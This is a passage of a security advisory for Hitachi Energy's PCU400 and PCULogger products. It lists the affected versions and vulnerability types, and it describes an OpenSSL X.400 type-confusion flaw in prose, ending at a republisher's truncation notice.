1. EXECUTIVE SUMMARY
- CVSS v3 7.5
- ATTENTION: Exploitable remotely/low attack complexity
- Vendor: Hitachi Energy
- Equipment: PCU400, PCULogger
- Vulnerabilities: Access of Resource Using Incompatible Type (‘Type Confusion’), NULL Pointer Dereference, Use After Free, Double Free, Observable Discrepancy, Out-of-bounds Read
2. RISK EVALUATION
Exploitation of these vulnerabilities could allow an attacker to access or decrypt sensitive data, crash the device application, or cause a denial-of-service condition.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
Hitachi Energy reports that the following products are affected:
- PCU400: Version 6.5 K and prior
- PCU400: Version 9.4.1 and prior
- PCULogger: Version 1.1.0 and prior
3.2 VULNERABILITY OVERVIEW
3.2.1 ACCESS OF RESOURCE USING INCOMPATIBLE TYPE (‘TYPE CONFUSION’) CWE-843
There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial-of-service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which hav
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
Read the original article: